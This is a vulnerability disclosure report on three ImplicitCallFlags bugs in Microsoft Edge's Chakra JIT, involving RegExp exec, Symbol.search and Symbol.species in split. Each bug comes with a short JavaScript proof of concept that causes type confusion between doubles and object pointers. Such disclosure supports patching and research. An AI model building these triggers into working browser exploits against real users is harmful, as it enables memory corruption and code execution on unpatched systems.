Microsoft Edge: Chakra: JIT: Multiple ImplicitCallFlags update bugs with RegExp The same bug class with issue 1334 (MSRC-40170). 1. Calling RegExp.prototype.exec without updating the "ImplicitCallFlags" flag in "JavascriptRegExp::CallExec". function opt(arr, re) { arr[0] = 1.1; 'a'.match(re); arr[0] = 2.3023e-320; } function main() { let arr = [1.1, 2.2, 3.3]; let re = /a/; for (let i = 0; i < 0x2000; i++) { opt(arr, re); } re.exec = function () { arr[0] = {}; return null; }; opt(arr, re); print(arr[0]); } main(); 2. Calling RegExp.prototype[Symbol.search] without updating the "ImplicitCallFlags" flag in "JavascriptString::CallRegExFunction". function opt(arr, re) { arr[0] = 1.1; let r = 'a'.search(re); arr[0] = 2.3023e-320; } function main() { let arr = [1.1, 2.2, 3.3]; let re = /a/; for (let i = 0; i < 0x2000; i++) { opt(arr, re); } re[Symbol.search] = function () { arr[0] = {}; return 0; }; opt(arr, re); print(arr[0]); } main(); 3. Calling Symbol.species without updating the "ImplicitCallFlags" flag in "RegexHelper::RegexEs6SplitImpl". function opt(arr, re) { arr[0] = 1.1; 'a'.split(re); arr[0] = 2.3023e-320; } function main() { let arr = [1.1, 2.2, 3.3]; let re = /a/; for (let i = 0; i < 0x2000; i++) { opt(arr, re); } re.constructor = { [Symbol.species]: function () { arr[0] = {}; return /a/; } }; opt(arr, re); print(arr[0]); } main(); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt